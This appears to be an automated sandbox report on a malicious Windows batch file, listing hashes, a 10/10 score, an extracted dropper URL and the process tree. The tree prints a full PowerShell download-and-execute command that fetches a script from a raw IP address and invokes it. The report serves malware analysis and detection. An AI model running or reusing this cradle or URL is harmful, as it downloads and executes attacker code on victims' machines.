Analysis
-
max time kernel
114s -
max time network
109s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
17-03-2020 21:10
General
-
Target
sGfuLFJL.bat
-
Size
193B
-
MD5
17c9f036750c9f73392ad5d300c77ef7
-
SHA1
e7f99574e7989564a222e10856daded5d49d5922
-
SHA256
ca270555bc105598de38c9103f8dd41470b6ea4ae35d5da3cfb75c27a7897204
-
SHA512
e5036da198a282c2ebdf7e0646d5aeeab5e28d20d7266b2cc7309569ab6770258a2f846a5f4470a03d07b63d16d3a0762f860aef106759ecf6be604e3df59d46
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/sGfuLFJL
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sGfuLFJL.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/sGfuLFJL');Invoke-XQXAUMNJQV;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB